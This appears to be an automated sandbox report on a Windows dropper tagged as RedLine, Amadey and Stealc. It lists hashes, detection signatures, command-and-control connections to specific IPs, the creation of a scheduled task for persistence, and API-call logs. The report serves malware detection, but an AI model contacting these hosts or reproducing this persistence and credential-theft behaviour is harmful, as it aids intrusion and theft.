popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

foto2552.exe

Emotet Gen1 RedLine stealer Amadey Malicious Library UPX Admin Tool (Sysinternals etc ...) ScreenShot PWS AntiDebug MSOffice File PNG Format PE File OS Processor Check PE32 CAB AntiVM DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 23, 2023, 4:48 p.m. Oct. 23, 2023, 4:54 p.m.
Size 1.5MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4cdb3ee7e130e01a02d7b8a7d8dae6ec
SHA256 97e759720fddf5321918c169fc23ced0272078081e40ab5c1c2f36cf523fb92a
CRC32 79933F06
ssdeep 24576:OyMMRU40y508+eqEF1Y/vN6M95+1WYru28jIKJFq8fdDS4Sbqc:dz8y509wFSnN6MLOruxjvA81ab
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 109.107.182.133:19084 -> 192.168.56.101:49172 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49201 -> 157.240.31.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49204 -> 142.250.66.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49199 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49172 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49174 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 77.91.124.1:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 77.91.124.1:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49171 -> 193.233.255.73:80 2047625 ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST) A Network Trojan was detected
TCP 192.168.56.101:49171 -> 193.233.255.73:80 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49211 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 109.107.182.133:19084 -> 192.168.56.101:49179 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49209 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 142.250.66.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49216 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 142.250.66.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 142.250.66.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 142.250.207.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49214 -> 142.250.204.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 142.250.204.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49210 -> 172.217.31.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 77.91.124.1:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 172.217.24.110:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49223 -> 77.91.124.1:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49218 -> 142.250.207.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49179 -> 109.107.182.133:19084 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 77.91.124.1:80 -> 192.168.56.101:49223 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49201
157.240.31.35:443 		C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com d2:70:1c:88:44:c4:5b:ce:c0:94:21:16:33:53:2b:ad:ff:95:57:38
TLSv1
192.168.56.101:49204
142.250.66.106:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com 28:23:2b:8b:2d:09:6c:bb:06:7a:35:80:95:bb:f8:03:41:c8:99:2c
TLSv1
192.168.56.101:49199
172.217.24.110:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.google.com c9:4d:78:ad:ec:04:27:ee:f0:06:4c:c8:78:d8:9f:06:b5:cc:39:37
TLSv1
192.168.56.101:49211
172.217.31.3:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1
192.168.56.101:49209
172.217.31.3:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1
192.168.56.101:49221
142.250.66.132:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com 3d:4a:6b:fd:30:97:01:e9:c1:38:5f:67:2b:a6:a3:43:7b:2e:72:45
TLSv1
192.168.56.101:49216
172.217.24.110:443 		None None None
TLSv1
192.168.56.101:49220
142.250.66.132:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=www.google.com 3d:4a:6b:fd:30:97:01:e9:c1:38:5f:67:2b:a6:a3:43:7b:2e:72:45
TLSv1
192.168.56.101:49205
142.250.66.106:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com 28:23:2b:8b:2d:09:6c:bb:06:7a:35:80:95:bb:f8:03:41:c8:99:2c
TLSv1
192.168.56.101:49219
142.250.207.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1
192.168.56.101:49200
172.217.24.110:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.google.com c9:4d:78:ad:ec:04:27:ee:f0:06:4c:c8:78:d8:9f:06:b5:cc:39:37
TLSv1
192.168.56.101:49214
142.250.204.109:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com c3:ef:cc:c7:6c:fd:21:e8:b0:08:50:37:0f:ac:b1:dd:ab:1d:1e:ff
TLSv1
192.168.56.101:49213
142.250.204.109:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=accounts.google.com c3:ef:cc:c7:6c:fd:21:e8:b0:08:50:37:0f:ac:b1:dd:ab:1d:1e:ff
TLSv1
192.168.56.101:49210
172.217.31.3:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33
TLSv1
192.168.56.101:49217
172.217.24.110:443 		None None None
TLSv1
192.168.56.101:49218
142.250.207.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=*.gstatic.com 55:7f:79:64:ed:7a:04:50:63:54:9c:32:2a:af:b7:95:17:d7:e0:33

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: "" https://www.facebook.com/login
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: "" https://www.youtube.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: "" https://accounts.google.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "explothe.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9c68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003b9e68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ba728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ba728
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003ba5e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503a58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503ad8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00503cd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00504598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00504598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00504458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x8fc13d
0x8fbf0e
0x8f6cad
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8fc278
registers.esp: 3337156
registers.edi: 3337208
registers.eax: 0
registers.ebp: 3337220
registers.edx: 3774440
registers.ebx: 3338428
registers.esi: 44250100
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x8438d96
0x8438c59
0x8438b75
0x843727b
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
